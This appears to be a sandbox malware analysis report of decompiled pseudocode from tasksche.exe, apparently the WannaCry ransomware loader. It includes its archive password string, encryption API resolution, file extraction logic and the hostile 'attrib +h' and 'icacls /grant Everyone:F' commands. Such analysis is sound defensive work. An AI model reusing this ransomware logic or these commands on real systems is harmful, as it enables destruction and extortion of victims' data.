(( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t79[1] & 0x000000ff) * 4);
                                                          							_t73 =  &(_t79[2]);
                                                          							_t85 = _t85 - 1;
                                                          						} while (_t85 != 0);
                                                          					}
                                                          					if(_a12 != 0) {
                                                          						do {
                                                          							_t35 = _t35 >> 0x00000008 ^  *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4);
                                                          							_t73 =  &(_t73[1]);
                                                          							_t32 =  &_a12;
                                                          							 *_t32 = _a12 - 1;
                                                          						} while ( *_t32 != 0);
                                                          					}
                                                          					return  !_t35;
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}












                                                          0x00405422
                                                          0x00405427
                                                          0x00405436
                                                          0x0040543d
                                                          0x00405447
                                                          0x0040544a
                                                          0x0040544f
                                                          0x00405465
                                                          0x0040547f
                                                          0x00405496
                                                          0x004054ad
                                                          0x004054c4
                                                          0x004054db
                                                          0x00405503
                                                          0x00405505
                                                          0x00405506
                                                          0x00405506
                                                          0x0040550d
                                                          0x00405512
                                                          0x00405514
                                                          0x00405527
                                                          0x00405529
                                                          0x0040552a
                                                          0x0040552a
                                                          0x0040552a
                                                          0x00405514
                                                          0x00405534
                                                          0x00405429
                                                          0x0040542c
                                                          0x0040542c

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
                                                          • Instruction ID: 3f72058ef88e406f14a8e4c5cd972b2546dbbe82ce95f55f9558457d0f17cbf0
                                                          • Opcode Fuzzy Hash: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
                                                          • Instruction Fuzzy Hash: 8E31A133E285B207C3249EBA5C4006AF6D2AB4A125B4A8775DE88F7355E128EC96C6D4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040170A() {
                                                          				void* _t3;
                                                          				_Unknown_base(*)()* _t11;
                                                          				struct HINSTANCE__* _t13;
                                                          				intOrPtr _t18;
                                                          				intOrPtr _t20;
                                                          				intOrPtr _t21;
                                                          				intOrPtr _t22;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t25;
                                                          
                                                          				if(E00401A45() == 0) {
                                                          					L11:
                                                          					return 0;
                                                          				}
                                                          				_t18 =  *0x40f878; // 0x0
                                                          				if(_t18 != 0) {
                                                          					L10:
                                                          					_t3 = 1;
                                                          					return _t3;
                                                          				}
                                                          				_t13 = LoadLibraryA("kernel32.dll");
                                                          				if(_t13 == 0) {
                                                          					goto L11;
                                                          				}
                                                          				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
                                                          				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
                                                          				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
                                                          				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
                                                          				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
                                                          				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
                                                          				_t11 = GetProcAddress(_t13, "CloseHandle");
                                                          				_t20 =  *0x40f878; // 0x0
                                                          				 *0x40f890 = _t11;
                                                          				if(_t20 == 0) {
                                                          					goto L11;
                                                          				}
                                                          				_t21 =  *0x40f87c; // 0x0
                                                          				if(_t21 == 0) {
                                                          					goto L11;
                                                          				}
                                                          				_t22 =  *0x40f880; // 0x0
                                                          				if(_t22 == 0) {
                                                          					goto L11;
                                                          				}
                                                          				_t23 =  *0x40f884; // 0x0
                                                          				if(_t23 == 0) {
                                                          					goto L11;
                                                          				}
                                                          				_t24 =  *0x40f888; // 0x0
                                                          				if(_t24 == 0) {
                                                          					goto L11;
                                                          				}
                                                          				_t25 =  *0x40f88c; // 0x0
                                                          				if(_t25 == 0 || _t11 == 0) {
                                                          					goto L11;
                                                          				} else {
                                                          					goto L10;
                                                          				}
                                                          			}













                                                          0x00401713
                                                          0x004017d8
                                                          0x00000000
                                                          0x004017d8
                                                          0x0040171b
                                                          0x00401721
                                                          0x004017d3
                                                          0x004017d5
                                                          0x00000000
                                                          0x004017d5
                                                          0x00401732
                                                          0x00401736
                                                          0x00000000
                                                          0x00000000
                                                          0x00401751
                                                          0x0040175e
                                                          0x0040176b
                                                          0x00401778
                                                          0x00401785
                                                          0x00401792
                                                          0x00401797
                                                          0x00401799
                                                          0x0040179f
                                                          0x004017a5
                                                          0x00000000
                                                          0x00000000
                                                          0x004017a7
                                                          0x004017ad
                                                          0x00000000
                                                          0x00000000
                                                          0x004017af
                                                          0x004017b5
                                                          0x00000000
                                                          0x00000000
                                                          0x004017b7
                                                          0x004017bd
                                                          0x00000000
                                                          0x00000000
                                                          0x004017bf
                                                          0x004017c5
                                                          0x00000000
                                                          0x00000000
                                                          0x004017c7
                                                          0x004017cd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                            • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                            • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                            • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                            • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                            • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                            • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                                                          • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                                                          • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                                                          • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                                                          • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                                                          • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                                                          • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                                                          • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                          • API String ID: 2238633743-1294736154
                                                          • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                          • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                                                          • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                          • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
                                                          				long _v8;
                                                          				char _v267;
                                                          				char _v268;
                                                          				struct _FILETIME _v284;
                                                          				struct _FILETIME _v292;
                                                          				struct _FILETIME _v300;
                                                          				long _v304;
                                                          				char _v568;
                                                          				char _v828;
                                                          				intOrPtr _t78;
                                                          				intOrPtr _t89;
                                                          				intOrPtr _t91;
                                                          				intOrPtr _t96;
                                                          				intOrPtr _t97;
                                                          				char _t100;
                                                          				void* _t112;
                                                          				void* _t113;
                                                          				int _t124;
                                                          				long _t131;
                                                          				intOrPtr _t136;
                                                          				char* _t137;
                                                          				char* _t144;
                                                          				void* _t148;
                                                          				char* _t150;
                                                          				void* _t154;
                                                          				signed int _t155;
                                                          				long _t156;
                                                          				void* _t157;
                                                          				char* _t158;
                                                          				long _t159;
                                                          				intOrPtr* _t161;
                                                          				long _t162;
                                                          				void* _t163;
                                                          				void* _t164;
                                                          
                                                          				_t154 = __edx;
                                                          				_t139 = __ecx;
                                                          				_t136 = _a16;
                                                          				_t161 = __ecx;
                                                          				if(_t136 == 3) {
                                                          					_t78 =  *((intOrPtr*)(__ecx + 4));
                                                          					_t155 = _a4;
                                                          					__eflags = _t155 - _t78;
                                                          					if(_t155 == _t78) {
                                                          						L14:
                                                          						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
                                                          						__eflags = _t156;
                                                          						if(_t156 <= 0) {
                                                          							E00406A97( *_t161);
                                                          							_t14 = _t161 + 4;
                                                          							 *_t14 =  *(_t161 + 4) | 0xffffffff;
                                                          							__eflags =  *_t14;
                                                          						}
                                                          						__eflags = _a7;
                                                          						if(_a7 == 0) {
                                                          							__eflags = _t156;
                                                          							if(_t156 <= 0) {
                                                          								__eflags = _t156 - 0xffffff96;
                                                          								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
                                                          							}
                                                          							return 0x600;
                                                          						} else {
                                                          							L17:
                                                          							return 0;
                                                          						}
                                                          					}
                                                          					__eflags = _t78 - 0xffffffff;
                                                          					if(_t78 != 0xffffffff) {
                                                          						E00406A97( *__ecx);
                                                          						_pop(_t139);
                                                          					}
                                                          					_t89 =  *_t161;
                                                          					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
                                                          					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
                                                          					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
                                                          						L3:
                                                          						return 0x10000;
                                                          					} else {
                                                          						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
                                                          						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
                                                          							L11:
                                                          							_t91 =  *_t161;
                                                          							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
                                                          							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
                                                          								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
                                                          								 *(_t161 + 4) = _t155;
                                                          								_pop(_t139);
                                                          								goto L14;
                                                          							}
                                                          							E00406520(_t91);
                                                          							L10:
                                                          							goto L11;
                                                          						}
                                                          						E004064E2(_t139, _t89);
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t136 == 2 || _t136 == 1) {
                                                          					__eflags =  *(_t161 + 4) - 0xffffffff;
                                                          					if( *(_t161 + 4) != 0xffffffff) {
                                                          						E00406A97( *_t161);
                                                          						_pop(_t139);
                                                          					}
                                                          					_t96 =  *_t161;
                                                          					_t157 = _a4;
                                                          					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
                                                          					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
                                                          					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
                                                          						goto L3;
                                                          					} else {
                                                          						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
                                                          						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
                                                          							L27:
                                                          							_t97 =  *_t161;
                                                          							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
                                                          							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
                                                          								E00406C40(_t161, _t154, _t157,  &_v568);
                                                          								__eflags = _v304 & 0x00000010;
                                                          								if((_v304 & 0x00000010) == 0) {
                                                          									__eflags = _t136 - 1;
                                                          									if(_t136 != 1) {
                                                          										_t158 = _a8;
                                                          										_t137 = _t158;
                                                          										_t144 = _t158;
                                                          										_t100 =  *_t158;
                                                          										while(1) {
                                                          											__eflags = _t100;
                                                          											if(_t100 == 0) {
                                                          												break;
                                                          											}
                                                          											__eflags = _t100 - 0x2f;
                                                          											if(_t100 == 0x2f) {
                                                          												L44:
                                                          												_t137 =  &(_t144[1]);
                                                          												L45:
                                                          												_t100 = _t144[1];
                                                          												_t144 =  &(_t144[1]);
                                                          												continue;
                                                          											}
                                                          											__eflags = _t100 - 0x5c;
                                                          											if(_t100 != 0x5c) {
                                                          												goto L45;
                                                          											}
                                                          											goto L44;
                                                          										}
                                                          										strcpy( &_v268, _t158);
                                                          										__eflags = _t137 - _t158;
                                                          										if(_t137 != _t158) {
                                                          											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
                                                          											__eflags = _v268 - 0x2f;
                                                          											if(_v268 == 0x2f) {
                                                          												L56:
                                                          												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
                                                          												E00407070(0,  &_v268);
                                                          												_t164 = _t164 + 0x18;
                                                          												L49:
                                                          												__eflags = 0;
                                                          												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
                                                          												L50:
                                                          												__eflags = _t112 - 0xffffffff;
                                                          												_a4 = _t112;
                                                          												if(_t112 != 0xffffffff) {
                                                          													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
                                                          													__eflags =  *(_t161 + 0x13c);
                                                          													_pop(_t148);
                                                          													if( *(_t161 + 0x13c) == 0) {
                                                          														L00407700();
                                                          														_t148 = 0x4000;
                                                          														 *(_t161 + 0x13c) = _t113;
                                                          													}
                                                          													_t60 =  &_a12;
                                                          													 *_t60 = _a12 & 0x00000000;
                                                          													__eflags =  *_t60;
                                                          													while(1) {
                                                          														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
                                                          														_t164 = _t164 + 0x10;
                                                          														__eflags = _t159 - 0xffffff96;
                                                          														if(_t159 == 0xffffff96) {
                                                          															break;
                                                          														}
                                                          														__eflags = _t159;
                                                          														if(__eflags < 0) {
                                                          															L68:
                                                          															_a12 = 0x5000000;
                                                          															L71:
                                                          															__eflags = _a16 - 1;
                                                          															if(_a16 != 1) {
                                                          																CloseHandle(_a4);
                                                          															}
                                                          															E00406A97( *_t161);
                                                          															return _a12;
                                                          														}
                                                          														if(__eflags <= 0) {
                                                          															L64:
                                                          															__eflags = _a11;
                                                          															if(_a11 != 0) {
                                                          																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
                                                          																goto L71;
                                                          															}
                                                          															__eflags = _t159;
                                                          															if(_t159 == 0) {
                                                          																goto L68;
                                                          															}
                                                          															continue;
                                                          														}
                                                          														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
                                                          														__eflags = _t124;
                                                          														if(_t124 == 0) {
                                                          															_a12 = 0x400;
                                                          															goto L71;
                                                          														}
                                                          														goto L64;
                                                          													}
                                                          													_a12 = 0x1000;
                                                          													goto L71;
                                                          												}
                                                          												return 0x200;
                                                          											}
                                                          											__eflags = _v268 - 0x5c;
                                                          											if(_v268 == 0x5c) {
                                                          												goto L56;
                                                          											}
                                                          											__eflags = _v268;
                                                          											if(_v268 == 0) {
                                                          												L48:
                                                          												_t160 = _t161 + 0x140;
                                                          												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
                                                          												E00407070(_t160,  &_v268);
                                                          												_t164 = _t164 + 0x1c;
                                                          												goto L49;
                                                          											}
                                                          											__eflags = _v267 - 0x3a;
                                                          											if(_v267 != 0x3a) {
                                                          												goto L48;
                                                          											}
                                                          											goto L56;
                                                          										}
                                                          										_t37 =  &_v268;
                                                          										 *_t37 = _v268 & 0x00000000;
                                                          										__eflags =  *_t37;
                                                          										goto L48;
                                                          									}
                                                          									_t112 = _a8;
                                                          									goto L50;
                                                          								}
                                                          								__eflags = _t136 - 1;
                                                          								if(_t136 == 1) {
                                                          									goto L17;
                                                          								}
                                                          								_t150 = _a8;
                                                          								_t131 =  *_t150;
                                                          								__eflags = _t131 - 0x2f;
                                                          								if(_t131 == 0x2f) {
                                                          									L35:
                                                          									_push(_t150);
                                                          									_push(0);
                                                          									L37:
                                                          									E00407070();
                                                          									goto L17;
                                                          								}
                                                          								__eflags = _t131 - 0x5c;
                                                          								if(_t131 == 0x5c) {
                                                          									goto L35;
                                                          								}
                                                          								__eflags = _t131;
                                                          								if(_t131 == 0) {
                                                          									L36:
                                                          									_t162 = _t161 + 0x140;
                                                          									__eflags = _t162;
                                                          									_push(_t150);
                                                          									_push(_t162);
                                                          									goto L37;
                                                          								}
                                                          								__eflags = _t150[1] - 0x3a;
                                                          								if(_t150[1] != 0x3a) {
                                                          									goto L36;
                                                          								}
                                                          								goto L35;
                                                          							}
                                                          							E00406520(_t97);
                                                          							L26:
                                                          							goto L27;
                                                          						}
                                                          						E004064E2(_t139, _t96);
                                                          						goto L26;
                                                          					}
                                                          				} else {
                                                          					goto L3;
                                                          				}
                                                          			}





































                                                          0x00407136
                                                          0x00407136
                                                          0x00407140
                                                          0x00407148
                                                          0x0040714a
                                                          0x00407168
                                                          0x0040716b
                                                          0x0040716e
                                                          0x00407170
                                                          0x004071b7
                                                          0x004071c8
                                                          0x004071cd
                                                          0x004071cf
                                                          0x004071d3
                                                          0x004071d8
                                                          0x004071d8
                                                          0x004071d8
                                                          0x004071dc
                                                          0x004071dd
                                                          0x004071e1
                                                          0x004071ea
                                                          0x004071ec
                                                          0x004071fa
                                                          0x00000000
                                                          0x00407206
                                                          0x00000000
                                                          0x004071e3
                                                          0x004071e3
                                                          0x00000000
                                                          0x004071e3
                                                          0x004071e1
                                                          0x00407172
                                                          0x00407175
                                                          0x00407179
                                                          0x0040717e
                                                          0x0040717e
                                                          0x0040717f
                                                          0x00407181
                                                          0x00407185
                                                          0x00407188
                                                          0x0040715e
                                                          0x00000000
                                                          0x0040718a
                                                          0x0040718a
                                                          0x0040718d
                                                          0x00407196
                                                          0x00407196
                                                          0x00407198
                                                          0x0040719b
                                                          0x004071ad
                                                          0x004071b3
                                                          0x004071b6
                                                          0x00000000
                                                          0x004071b6
                                                          0x0040719e
                                                          0x00407195
                                                          0x00000000
                                                          0x00407195
                                                          0x00407190
                                                          0x00000000
                                                          0x00407190
                                                          0x00407188
                                                          0x0040714f
                                                          0x00407210
                                                          0x00407214
                                                          0x00407218
                                                          0x0040721d
                                                          0x0040721d
                                                          0x0040721e
                                                          0x00407220
                                                          0x00407223
                                                          0x00407227
                                                          0x0040722a
                                                          0x00000000
                                                          0x00407230
                                                          0x00407230
                                                          0x00407233
                                                          0x0040723c
                                                          0x0040723c
                                                          0x0040723e
                                                          0x00407241
                                                          0x00407255
                                                          0x0040725a
                                                          0x00407261
                                                          0x0040729c
                                                          0x0040729f
                                                          0x004072a9
                                                          0x004072ac
                                                          0x004072ae
                                                          0x004072b0
                                                          0x004072b2
                                                          0x004072b2
                                                          0x004072b4
                                                          0x00000000
                                                          0x00000000
                                                          0x004072b6
                                                          0x004072b8
                                                          0x004072be
                                                          0x004072be
                                                          0x004072c1
                                                          0x004072c1
                                                          0x004072c4
                                                          0x00000000
                                                          0x004072c4
                                                          0x004072ba
                                                          0x004072bc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004072bc
                                                          0x004072cf
                                                          0x004072d5
                                                          0x004072d8
                                                          0x00407347
                                                          0x0040734f
                                                          0x00407356
                                                          0x0040737b
                                                          0x0040738f
                                                          0x0040739e
                                                          0x004073a3
                                                          0x00407312
                                                          0x00407312
                                                          0x0040732b
                                                          0x00407331
                                                          0x00407331
                                                          0x00407334
                                                          0x00407337
                                                          0x004073b3
                                                          0x004073b8
                                                          0x004073c0
                                                          0x004073c6
                                                          0x004073c9
                                                          0x004073ce
                                                          0x004073cf
                                                          0x004073cf
                                                          0x004073d5
                                                          0x004073d5
                                                          0x004073d5
                                                          0x004073d9
                                                          0x004073eb
                                                          0x004073ed
                                                          0x004073f0
                                                          0x004073f3
                                                          0x00000000
                                                          0x00000000
                                                          0x004073f5
                                                          0x004073f7
                                                          0x0040742a
                                                          0x0040742a
                                                          0x0040745a
                                                          0x0040745a
                                                          0x0040745e
                                                          0x00407463
                                                          0x00407463
                                                          0x0040746b
                                                          0x00000000
                                                          0x00407473
                                                          0x004073f9
                                                          0x00407415
                                                          0x00407415
                                                          0x00407419
                                                          0x00407454
                                                          0x00000000
                                                          0x00407454
                                                          0x0040741b
                                                          0x0040741d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741f
                                                          0x0040740b
                                                          0x00407411
                                                          0x00407413
                                                          0x00407433
                                                          0x00000000
                                                          0x00407433
                                                          0x00000000
                                                          0x00407413
                                                          0x00407421
                                                          0x00000000
                                                          0x00407421
                                                          0x00000000
                                                          0x00407339
                                                          0x00407358
                                                          0x0040735f
                                                          0x00000000
                                                          0x00000000
                                                          0x00407361
                                                          0x00407368
                                                          0x004072e1
                                                          0x004072e7
                                                          0x004072fc
                                                          0x0040730a
                                                          0x0040730f
                                                          0x00000000
                                                          0x0040730f
                                                          0x0040736e
                                                          0x00407375
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407375
                                                          0x004072da
                                                          0x004072da
                                                          0x004072da
                                                          0x00000000
                                                          0x004072da
                                                          0x004072a1
                                                          0x00000000
                                                          0x004072a1
                                                          0x00407263
                                                          0x00407266
                                                          0x00000000
                                                          0x00000000
                                                          0x0040726c
                                                          0x0040726f
                                                          0x00407271
                                                          0x00407273
                                                          0x00407283
                                                          0x00407283
                                                          0x00407284
                                                          0x00407290
                                                          0x00407290
                                                          0x00000000
                                                          0x00407296
                                                          0x00407275
                                                          0x00407277
                                                          0x00000000
                                                          0x00000000
                                                          0x00407279
                                                          0x0040727b
                                                          0x00407288
                                                          0x00407288
                                                          0x00407288
                                                          0x0040728e
                                                          0x0040728f
                                                          0x00000000
                                                          0x0040728f
                                                          0x0040727d
                                                          0x00407281
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407281
                                                          0x00407244
                                                          0x0040723b
                                                          0x00000000
                                                          0x0040723b
                                                          0x00407236
                                                          0x00000000
                                                          0x00407236
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s%s$%s%s%s$:$\
                                                          • API String ID: 0-1100577047
                                                          • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                          • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                                                          • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                          • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E0040203B(intOrPtr* __eax, void* __edi) {
                                                          				void* _t25;
                                                          				intOrPtr* _t33;
                                                          				int _t42;
                                                          				CHAR* _t63;
                                                          				void* _t64;
                                                          				char** _t66;
                                                          
                                                          				__imp____p___argv();
                                                          				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
                                                          					L4:
                                                          					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
                                                          						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
                                                          					}
                                                          					SetCurrentDirectoryA(_t64 - 0x20c);
                                                          					E004010FD(1);
                                                          					 *_t66 = "WNcry@2ol7";
                                                          					_push(_t42);
                                                          					L00401DAB();
                                                          					E00401E9E();
                                                          					E00401064("attrib +h .", _t42, _t42);
                                                          					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
                                                          					_t25 = E0040170A();
                                                          					_t74 = _t25;
                                                          					if(_t25 != 0) {
                                                          						E004012FD(_t64 - 0x6e4, _t74);
                                                          						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
                                                          							 *(_t64 - 4) = _t42;
                                                          							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
                                                          								_t33 = E00402924(_t32, "TaskStart");
                                                          								_t78 = _t33 - _t42;
                                                          								if(_t33 != _t42) {
                                                          									 *_t33(_t42, _t42);
                                                          								}
                                                          							}
                                                          						}
                                                          						E0040137A(_t64 - 0x6e4, _t78);
                                                          					}
                                                          					goto L13;
                                                          				} else {
                                                          					_t63 = "tasksche.exe";
                                                          					CopyFileA(_t64 - 0x20c, _t63, _t42);
                                                          					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
                                                          						goto L4;
                                                          					} else {
                                                          						L13:
                                                          						return 0;
                                                          					}
                                                          				}
                                                          			}









                                                          0x00402040
                                                          0x00402054
                                                          0x0040208e
                                                          0x004020a3
                                                          0x004020b1
                                                          0x004020b3
                                                          0x004020bb
                                                          0x004020c3
                                                          0x004020c8
                                                          0x004020cf
                                                          0x004020d0
                                                          0x004020d5
                                                          0x004020e1
                                                          0x004020ed
                                                          0x004020f5
                                                          0x004020fa
                                                          0x004020fc
                                                          0x00402104
                                                          0x00402119
                                                          0x0040212a
                                                          0x00402134
                                                          0x0040214b
                                                          0x00402151
                                                          0x00402154
                                                          0x00402158
                                                          0x00402158
                                                          0x00402154
